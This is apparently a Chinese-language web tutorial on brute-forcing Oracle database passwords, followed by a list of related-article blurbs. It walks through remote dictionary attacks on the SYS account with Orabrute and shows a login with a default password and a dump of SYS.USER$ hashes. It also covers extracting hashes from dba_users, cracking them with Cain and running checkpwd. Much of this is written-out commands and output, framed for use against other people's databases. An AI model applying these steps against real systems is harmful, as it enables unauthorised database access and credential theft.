暴力破解Oracle数据库密码的方法
一、前提条件
要连接远程的 Oracle 数据库,需要知道 SID,用户名, 密码,当然还有最重要的 IP 地址。SID 如果被管理 员修改的话,可以利用 sidguess 来进行破解,速度非常的快,至于成功与否,就要看你的字典配置了。可以得知选择远程破解Oracle 的最好帐户是SYS,因为此帐户永远有效。在Oracle10g以前的版本在安装的时候并没有提示修改SYS 的默认密码,Oracle10g 虽然提示修改密码了,但是并没有检查密码的复杂性。
二、破解方法
1、使用Orabrute 工具来进行远程破解
可以使用Orabrute 工具来进行远程破解,在使用这个工具的时候,需要系统提前安装好Sqlplus,该工具的
原理很简单,就是不停的调用Sqlplus 然后进行登录验证,帐户选择的是SYS,密码则为password.txt 中的密码单词。只要登录成功,就会调用selectpassword.sql 脚本抓取出在SYS.USER$表中的其他用户的哈希值,然后退出程序。这里有个注意的地方,当第二次运行Orabrute 的时候,需要删除或移动同目录下的前一次运行Orabrute 时生成的thepasswordsarehere.txt 和output.txt 文件。
Orabrute 的使用方法为:
D:\soft\oracle\Orabrute>orabrute
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>
D:\soft\oracle\Orabrute>
Orabrute 的破解速度比较慢,建议在password.txt开头加上诸如change_on_install这样你认为可能的密码。
D:\soft\oracle\Orabrute>orabrute 172.19.111.37 1521 orcl 2000
Orabrute v 1.2 by Paul M. Wright and David J. Morgan:
orabrute <hostip> <port> <sid> <millitimewait>sqlplus.exe -S -L "SYS/change_on_install@172.19.111.37:1521/orcl" as sysdba @selectpassword.sql
NAME PASSWORD
------------------------------ ------------------------------
SYS D4C5016086B2DC6A
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM D4DF7931AB130E37
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
2、使用Cain工具破解Oracle密码
首先,通过SQLPlus获得用户名和密码的Hash,SQL> select username,password from dba_users;
USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYS
8A8F025737A9097A
SYSTEM
2D594E86F93B17A1
DBSNMP
FFF45BB2C0C327EC
USERNAME
------------------------------------------------------------
PASSWORD
------------------------------------------------------------
SYSMAN
2CA614501F09FCCC
MGMT_VIEW
7967E9F7D325932C
ABC2
2BC5EEFA22EE5E5E
其次,安装Cain,安装后的截图如下:
最后,利用Cain的crack功能对Oracle的密码进行字典猜解,步骤如下:
第一步:运行cain,点击Craker中的Oracle
暴力破解Oracle数据库密码的方法
第二步:输入用户名和密码Hash,如:SYS 8A8F025737A9097A
暴力破解Oracle数据库密码的方法
第二步:点击Start,等5分钟后会发现破解的结果
暴力破解Oracle数据库密码的方法
暴力破解Oracle数据库密码的方法
破解后的密码为oracle
3、 Oracle Checkpasswd_big 破解密码
C:\oracle_checkpwd_big>checkpwd system/wy@//192.168.1.116:1521/NBO password_file
下载地址http://www.red-database-security.com/software/checkpwd.html
分享到:
相关推荐
Oracle 数据库用户名及密码修改 Oracle 数据库用户名及密码修改是指在 Oracle 数据库中修改现有用户名和密码的操作。该操作需要使用 sys 用户登陆数据库,然后找到需要修改的用户,修改用户名和密码,最后提交并...
Oracle 数据库用户密码解锁和修改 Oracle 数据库用户密码是数据库管理员的重要资产,为了确保数据库的安全性和可靠性,密码的管理是非常重要的。然而,在实际操作中,忘记 sys 和 system 密码或者在安装时忘记解锁 ...
Oracle数据库密码文件是确保数据库安全的重要组件,主要用于特权用户(如INTERNAL、SYSDBA和SYSOPER)的身份验证。本文将深入探讨密码文件的创建、使用和维护。 首先,密码文件通常位于`ORACLE_HOME\DATABASE`目录...
该文件为一个校验oracle数据库密码复杂度的脚本
SQL SERVER 连接 Oracle 数据库几种方法 在实际开发中,我们经常需要在 SQL Server 中连接 Oracle 数据库,以便实现数据交换和集成。那么,如何在 SQL Server 中连接 Oracle 数据库呢?下面我们将介绍几种常见的...
Oracle数据库课程设计医院系统数据库源代码。包含Java代码和SQL语句。源码中默认使用的数据库为运行的Oracle数据库 如需修改,在java源码/database.propertie中修改即可!Oracle数据库课程设计医院系统数据库源代码...
### Oracle数据库日志查看方法详解 #### 一、概述 Oracle数据库是企业级应用中广泛使用的数据库管理系统之一,为了确保数据库系统的稳定运行和快速定位问题,掌握Oracle数据库日志查看方法至关重要。本文将详细...
《Oracle 12c数据库基础教程》教学课件—03Oracle数据库管理工具.pdf《Oracle 12c数据库基础教程》教学课件—03Oracle数据库管理工具.pdf《Oracle 12c数据库基础教程》教学课件—03Oracle数据库管理工具.pdf《Oracle...
本文将详细介绍如何避免在 Oracle 数据库密码中出现 @符号,并提供了一些实用的解决方法和建议。 首先,需要了解 Oracle 中 @符号的作用。在 Oracle 中,@符号用来表明使用哪一台 Oracle 服务器。因此,在设置密码...
在Oracle数据库环境中,管理员或用户的密码有时会因为安全策略而过期,导致无法正常登录。当遇到这种情况,尤其是对于sysdba这种特权用户来说,解决密码过期问题显得尤为重要,因为这直接影响到系统的管理和维护。本...
Veeam 备份恢复 Oracle 数据库详细配置文档 本文档旨在详细介绍如何使用 Veeam 备份恢复 Oracle 数据库的配置过程。该文档将指导读者从环境准备到推送 Oracle RMAN Plugin,再到创建备份作业和运行备份作业,最后...
本文将根据给定的信息“如何备份还原oracle数据库”,详细介绍备份与恢复Oracle数据库的方法与步骤。 ### 一、Oracle数据库备份的重要性 在日常维护工作中,由于硬件故障、人为操作失误或系统崩溃等原因,可能会...
本文实例讲述了Python操作Oracle数据库的简单方法和封装类。分享给大家供大家参考,具体如下: 最近工作有接触到Oracle,发现很多地方用Python脚本去做的话,应该会方便很多,所以就想先学习下Python操作Oracle的...
暴力,破解oracle数据库。.docx
如何截获 Oracle 数据库连接密码 Oracle 数据库连接密码截获是对于 Oracle 系统来说一个非常重要的安全问题。 Oracle 系统的结构可以描述为:客户端应用程序 (1)--> Oracle 客户端软件 (2)---> 系统 TCP/IP 模块 (3...
2. 提供oracle数据库dba日常管理方法。 3. 掌握oracle数据库体系机构,为oracle优化奠定基础。 三、适合人群: 1.有意从事oracle 数据库工作,担任dba角色的人员; 2. Oracle数据库设计、开发和备份等管理人员; ...
连接 Oracle 数据库是每个开发者和数据库管理员都需要掌握的基本技能,但是很多人在连接 Oracle 数据库时都会遇到各种问题,本文将详细介绍如何连接 Oracle 数据库及故障解决办法。 首先,在连接 Oracle 数据库之前...
2. 然后安装Oracle Instant Client,这是一个轻量级的Oracle客户端,提供了连接Oracle数据库所需的基本组件。 3. 在php.ini文件中启用oci8扩展,这一步需要在php.ini文件中设置extension=php_oci8以启用OCI8扩展。 4...
在IT行业中,数据库管理系统(DBMS)是至关重要的组成部分,Oracle是其中的佼佼者,尤其在企业级应用中广泛使用。易语言,作为一种简洁易学的编程语言,提供了与Oracle数据库交互的能力,使得开发者可以方便地进行...
VB 访问 Oracle 远程数据库方法与实现 本文主要介绍了使用 VB 访问 Oracle 远程数据库的方法和实现。文章首先介绍了使用 VB 访问 Oracle 远程数据库的必要条件,然后详细介绍了使用 OO40(Oracle Objects for OLE)...